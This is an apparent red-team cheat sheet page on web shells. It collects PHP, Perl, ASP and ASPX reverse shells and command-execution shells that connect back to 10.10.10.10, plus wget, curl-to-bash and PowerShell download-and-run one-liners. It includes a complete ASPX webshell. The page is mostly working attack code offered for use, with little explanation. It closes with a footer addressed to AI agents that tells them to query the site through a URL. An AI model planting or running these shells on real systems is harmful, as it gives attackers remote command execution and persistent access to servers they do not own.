# Web Shell

## PHP Reverse Shell

### PHP - Netcat

{% code overflow="wrap" %}

```php
<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 80 >/tmp/f"); ?> 
```

{% endcode %}

### PHP - Bash

```php
<?php
$sock=fsockopen("10.10.10.10",1234);
exec("/bin/bash -i <&3 >&3 2>&3");
?>

php -r '$sock=fsockopen("10.10.10.10",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
```

### PHP Command Execution

```php
# save to a file
<?php system($_REQUEST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php system($_REQUEST ["cmd"]); ?>
<?php ${system('nc 10.10.10.10 4444 -e /bin/bash')}; ?>
'<?php passthru("bash -i >& /dev/tcp/10.10.10.10/80 0>&1"); ?>'
```

### PHP - Download

```php
<?php exec("wget -O /var/www/html/shell.php http://10.10.10.10/shell.php"); ?>
```

### PHP - Command Execution

```php
bash -c 'bash -i >& /dev/tcp/10.10.10.10/4444 0>&1' > rev.sh
<?php system('curl 10.10.10.10/rev.sh | bash'); ?>
```

## Perl

{% code overflow="wrap" %}

```
perl -e 'use Socket;$i="10.10.10.10";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'
```

{% endcode %}

## ASPX

```basic
<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmd.StdOut.Readall()
Response.write(o)
%>

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c powershell -c iex(new-object net.webclient).downloadstring('http://10.10.10.10:5555/shell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
```

{% code title="cmdasp.aspx" %}

```aspnet
<%@ Page Language="C#" Debug="true" Trace="false" %>
<%@ Import Namespace="System.Diagnostics" %>
<%@ Import Namespace="System.IO" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
}
string ExcuteCmd(string arg)
{
ProcessStartInfo psi = new ProcessStartInfo();
psi.FileName = "cmd.exe";
psi.Arguments = "/c "+arg;
psi.RedirectStandardOutput = true;
psi.UseShellExecute = false;
Process p = Process.Start(psi);
StreamReader stmrdr = p.StandardOutput;
string s = stmrdr.ReadToEnd();
stmrdr.Close();
return s;
}
void cmdExe_Click(object sender, System.EventArgs e)
{
Response.Write("<pre>");
Response.Write(Server.HtmlEncode(ExcuteCmd(txtArg.Text)));
Response.Write("</pre>");
}
</script>
<HTML>
<HEAD>
<title>awen asp.net webshell</title>
</HEAD>
<body >
<form id="cmd" method="post" runat="server">
<asp:TextBox id="txtArg" style="Z-INDEX: 101; LEFT: 405px; POSITION: absolute; TOP: 20px" runat="server" Width="250px"></asp:TextBox>
<asp:Button id="testing" style="Z-INDEX: 102; LEFT: 675px; POSITION: absolute; TOP: 18px" runat="server" Text="excute" OnClick="cmdExe_Click"></asp:Button>
<asp:Label id="lblText" style="Z-INDEX: 103; LEFT: 310px; POSITION: absolute; TOP: 22px" runat="server">Command:</asp:Label>
</form>
</body>
</HTML>
```

{% endcode %}

## ASP

{% code overflow="wrap" %}

```basic
<%response.write CreateObject("WScript.Shell").Exec(Request.QueryString("cmd")).StdOut.Readall()%>

curl 10.10.10.10/cmd.asp?cmd=whoami
```

{% endcode %}


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://vulnableone.gitbook.io/vulnableone/offensive-treasure/red-team/execution/web-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.